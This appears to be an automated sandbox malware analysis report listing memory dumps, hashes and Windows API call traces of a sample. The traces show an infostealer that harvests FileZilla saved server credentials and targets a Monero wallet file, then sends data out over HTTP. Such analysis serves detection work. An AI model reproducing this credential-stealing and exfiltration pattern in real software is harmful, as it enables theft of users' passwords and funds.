                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &?3$EUt
                          • API String ID: 0-3515008038
                          • Opcode ID: 94efc3a972f74c9921cf88635e8f0115645bc8f3bd83f8b5a40be6191d10f2fc
                          • Instruction ID: 60047102aaebe9ae497336513fe643f7c41935be5ace6a46f8636710c5a9fba2
                          • Opcode Fuzzy Hash: 94efc3a972f74c9921cf88635e8f0115645bc8f3bd83f8b5a40be6191d10f2fc
                          • Instruction Fuzzy Hash: 2832BFF260C600AFE3056E29EC8567EFBE9EF94720F16492DE6C483744E6359845CB93
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: apRl
                          • API String ID: 0-983971215
                          • Opcode ID: f682b2990edad32e0479356b41b5610b70dd0802a6b7933bf72f50014b3bebba
                          • Instruction ID: 3821181e8f56393eb6dde2331d510e4f596a018ff69837f816b5d158b9beeb8e
                          • Opcode Fuzzy Hash: f682b2990edad32e0479356b41b5610b70dd0802a6b7933bf72f50014b3bebba
                          • Instruction Fuzzy Hash: 20B216F3A0C2049FE3046E2DEC8567ABBE9EF94360F16463DEAC4D3744EA3558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %G|9$]p?n
                          • API String ID: 0-2928256004
                          • Opcode ID: 9ece8693cc481cf0af6f22bf6ea496c863c5d63a57e8ee7cbdc72b5db7194e19
                          • Instruction ID: 6dfe60da141cfa667439caab1f420ce9f36c08eda0ad75adba580119b6f2783d
                          • Opcode Fuzzy Hash: 9ece8693cc481cf0af6f22bf6ea496c863c5d63a57e8ee7cbdc72b5db7194e19
                          • Instruction Fuzzy Hash: E6917CF3A042019FE7149E2CED85767B7D6DB94321F29453EEAC8C3780F63598098796
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Z]{
                          • API String ID: 0-1084309153
                          • Opcode ID: 772b37c8aca1514951aeafd04dfbe67a445ef2770dbe6b978057d89fb0863804
                          • Instruction ID: 147f2d08560509fa51128085895e3aede4b22638b159b650f17da6de5ed4eb43
                          • Opcode Fuzzy Hash: 772b37c8aca1514951aeafd04dfbe67a445ef2770dbe6b978057d89fb0863804
                          • Instruction Fuzzy Hash: 5D5149B3A082105BE705AA2DDC5876BF7D5EFD4720F1B892DEAC993744E9349C0187C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <@&%
                          • API String ID: 0-1677279910
                          • Opcode ID: c5c8ae1d2d12ad9483a60b2a40c59c00b9829c561461c12ac63a7b6b5f9f0749
                          • Instruction ID: 51109a1ccb40e34816740370e5649d93bf9bea91b223b86370295857aa69425e
                          • Opcode Fuzzy Hash: c5c8ae1d2d12ad9483a60b2a40c59c00b9829c561461c12ac63a7b6b5f9f0749
                          • Instruction Fuzzy Hash: 875126A3F152085BF304587ADD84777B68BD7D4724F2AC23996489B7C9ECBE5C0A0294
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • String ID: {Mxz
                          • API String ID: 0-2987298254
                          • Opcode ID: 3784ab3359c02e869a3602831bacb6da35e6a13d4a7226b70ea1d4d83b56016d
                          • Instruction ID: 0d2cdc8b3578bb5e931aa4a417120066772870dad915812d893f4caa485eb507
                          • Opcode Fuzzy Hash: 3784ab3359c02e869a3602831bacb6da35e6a13d4a7226b70ea1d4d83b56016d
                          • Instruction Fuzzy Hash: FC5117F3E056244FF3006968DC4837AB696ABA4720F2B463CCFD8677C5E97A1D0482C6
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • String ID: G)~~
                          • API String ID: 0-370854580
                          • Opcode ID: a8005179bcaad5efe3adfaa0a0589f7c318d0fb085b18f64a8549e0f57d2bbe0
                          • Instruction ID: a7be2eeffede958cdab07c5cb168fc045a72255d72a9f7f7d538dc84aa275dd8
                          • Opcode Fuzzy Hash: a8005179bcaad5efe3adfaa0a0589f7c318d0fb085b18f64a8549e0f57d2bbe0
                          • Instruction Fuzzy Hash: 2A41AFF350C204DFD7147E68EC853BABBE4AF54310F26492ED6D68A280E6754950B787
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • Opcode ID: 8c3c6c11ae1cb1f945df3f84f008639c6f167ece5ae8b3db246809b33027b0e7
                          • Instruction ID: c0de37735827492ec0f5f04886bf68efbb33fe8f7e6219fe24ced7ac9041b728
                          • Opcode Fuzzy Hash: 8c3c6c11ae1cb1f945df3f84f008639c6f167ece5ae8b3db246809b33027b0e7
                          • Instruction Fuzzy Hash: BE7136F3A096009FE304AE2CED8527AF7E5EF94320F1A4A3DE9C8D7344E97558058752
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • Opcode ID: 83e791be98c5fab08fffa0e3194df796c6411ccb41909f1edb7263d79443b4a7
                          • Instruction ID: b6b7233cd29b259a9c2e3ba6258a09dc0334f2c44a9800347fca848b230ac21d
                          • Opcode Fuzzy Hash: 83e791be98c5fab08fffa0e3194df796c6411ccb41909f1edb7263d79443b4a7
                          • Instruction Fuzzy Hash: 58617DF3A086109BE7086E2CDC547BEBBD9EF85720F17463DDAC597784E979180082D2
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • Opcode ID: bac22d9a26ddd6c49f7a54a79405f9c36167e6023693245fd611e3dd6a438f64
                          • Instruction ID: 0794e0a4415432f4846a5705e772123936f3ab0e72e6438908d3c90741c6564a
                          • Opcode Fuzzy Hash: bac22d9a26ddd6c49f7a54a79405f9c36167e6023693245fd611e3dd6a438f64
                          • Instruction Fuzzy Hash: 6D5128B3A082149FE3086A19DC45B7BFBE6EBD4720F17453DE6C887780ED7598018696
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • Opcode ID: 6d3654f66d07f05a2ec8ff7d2e960f453f895b85ec0ec36d8e5079a355f41794
                          • Instruction ID: 3339ca4ab697efda6496648b0f7af712a17e87e3732eaa6621478f2ebe9726e0
                          • Opcode Fuzzy Hash: 6d3654f66d07f05a2ec8ff7d2e960f453f895b85ec0ec36d8e5079a355f41794
                          • Instruction Fuzzy Hash: F541CEF260C3049BE3147E29DC8577AF7EAEF98720F1A892DE7D483780EA3955008656
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • Opcode ID: 277a101bce75ba1537c750c278713a0719286a65669e2474f86f177f145dc198
                          • Instruction ID: 7ecb94be5b8f24cb06e93f7786337fefdc4b07f90f8dde74d47f89331450b98f
                          • Opcode Fuzzy Hash: 277a101bce75ba1537c750c278713a0719286a65669e2474f86f177f145dc198
                          • Instruction Fuzzy Hash: F44136F3A186141BE3086A6CEC6177BB7D6EB58351F2A453EEA89D3784F8394D014286
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                           Similarity
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00B00DBA,00B00DB7,00B00DB6,00B00DB3), ref: 00AF0362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF0369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00AF0385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00AF03CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF03DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00AF0419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00AF0463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF0532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00AF0562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00AF0571
                          • lstrcat.KERNEL32(?,url: ), ref: 00AF0580
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF0593
                          • lstrcat.KERNEL32(?,00B01678), ref: 00AF05A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF05B5
                          • lstrcat.KERNEL32(?,00B0167C), ref: 00AF05C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00AF05D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF05E6
                          • lstrcat.KERNEL32(?,00B01688), ref: 00AF05F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00AF0604
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF0617
                          • lstrcat.KERNEL32(?,00B01698), ref: 00AF0626
                          • lstrcat.KERNEL32(?,00B0169C), ref: 00AF0635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B00DB2), ref: 00AF068E
                           Memory Dump Source
                           • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 64ee9fa268b969812a7ecc7e920b771e459a30a976c991f559d85659bcaa24be
                          • Instruction ID: 78b427bbe0b5d3bf376dd59cdd8b407cd63ff2fd53b958215104d94a536dd303
                          • Opcode Fuzzy Hash: 64ee9fa268b969812a7ecc7e920b771e459a30a976c991f559d85659bcaa24be
                          • Instruction Fuzzy Hash: A7D130B190020CABCB14FBE4DE96EFEB778EF24340F404558F606A7195DE74AA06DB61
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AE59F8
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0179E2B8,00000000,?,01799DC0,00000000,?,00B01A1C), ref: 00AE5E71
                          • lstrlen.KERNEL32(00000000), ref: 00AE5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AE5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00AE5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00AE5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AE5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00AE5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AE5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00AE5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00AE5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00AE5FBD
                          • HttpOpenRequestA.WININET(00000000,0179E318,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE5BF8
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00AE5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 2f7d6ba96a242ae72c60a6a6c1a6eca1628ca88c6ea4f29d14f07e2bc734c74b
                          • Instruction ID: 9eee3f406d8665e90d8f738f59d756c1d4d308e48d6de3f3950c968544500b08
                          • Opcode Fuzzy Hash: 2f7d6ba96a242ae72c60a6a6c1a6eca1628ca88c6ea4f29d14f07e2bc734c74b
                          • Instruction Fuzzy Hash: 701204B191011CABDB15EBE4DD95FEE7378BF24740F4041A9B20AA2191DF702B4ACFA5
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AECF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AED0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AED0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED208
                          • lstrcat.KERNEL32(?,00B01478), ref: 00AED217
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED22A
                          • lstrcat.KERNEL32(?,00B0147C), ref: 00AED239
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED24C
                          • lstrcat.KERNEL32(?,00B01480), ref: 00AED25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED26E
                          • lstrcat.KERNEL32(?,00B01484), ref: 00AED27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED290
                          • lstrcat.KERNEL32(?,00B01488), ref: 00AED29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED2B2
                          • lstrcat.KERNEL32(?,00B0148C), ref: 00AED2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED2D4
                          • lstrcat.KERNEL32(?,00B01490), ref: 00AED2E3
                            • Part of subcall function 00AFA820: lstrlen.KERNEL32(00AE4F05,?,?,00AE4F05,00B00DDE), ref: 00AFA82B
                            • Part of subcall function 00AFA820: lstrcpy.KERNEL32(00B00DDE,00000000), ref: 00AFA885
                          • lstrlen.KERNEL32(?), ref: 00AED32A
                          • lstrlen.KERNEL32(?), ref: 00AED339
                            • Part of subcall function 00AFAA70: StrCmpCA.SHLWAPI(01798B28,00AEA7A7,?,00AEA7A7,01798B28), ref: 00AFAA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00AED3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: ee4afc155d181a0d27e38223b37b4128cb260696e5f4c5e25e374fc0d028450d
                          • Instruction ID: 96055cf283269c0294e64f3c1bb392b7972fb733124db8f56cefa7bbba9af47d
                          • Opcode Fuzzy Hash: ee4afc155d181a0d27e38223b37b4128cb260696e5f4c5e25e374fc0d028450d
                          • Instruction Fuzzy Hash: A3E112B1910108ABCB14FBE4DE95EFE7378EF24341F104554F60AA61A1DF756A0ACBB2
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AE4915
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B00DDB,00000000,?,?,00000000,?,",00000000,?,0179E248), ref: 00AE4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AE4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AE4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AE4E49
